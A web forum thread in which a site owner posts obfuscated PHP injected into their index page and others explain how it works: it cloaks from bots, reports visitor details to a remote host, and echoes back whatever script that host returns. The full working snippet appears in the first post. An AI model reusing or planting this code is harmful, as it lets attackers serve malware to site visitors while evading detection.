what does this code do?

[bigBrumm]

someone broke into my site and added the following to my index page:

 

error_reporting(0); ini_set('display_errors',0); $wp_amcjz4740 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_amcjz4740) && !preg_match ('/bot/i', $wp_amcjz4740))){
$wp_amcjz094740="http://"."template"."body".".com/body"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_amcjz4740);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_amcjz094740);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_4740amcjz = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_4740amcjz,1,3) === 'scr' ){ echo $wp_4740amcjz; }
 

 

I've removed it and changed the FTP access.

But I was wondering what it actually did? I can understand bits, but cannot really put everything together.

[davidannis]

Looks to me like it looks to make sure that that the request was from a browser not from a bot and if it is adds malicious code to your page from a remote server. By not serving the malicious code to bots it delays Google warning users that your site is hosting malware.

[bigBrumm]

thanks, how can I find out the address of the remote server is?

[davidannis]

$wp_amcjz094740="http://"."template"."body".".com/body"."/

It looks to me like it is set to go to http[This is here to break the link]://template.body.com/body/ but I may be missing something and I'm not surfing over there to figure it out.

[davidannis]

Is there anybody with more experience with cURL than me, who can confirm or correct me? I don't have confidence in my answer.

[requinix]

It retrieves stuff from that server, after telling it which site it's running from and some information about the user, then will probably output whatever stuff it got back.

It means they can put on your site anything from ads to malware to malicious Javascript to basically anything they want. Only thing it won't do is execute arbitrary PHP code.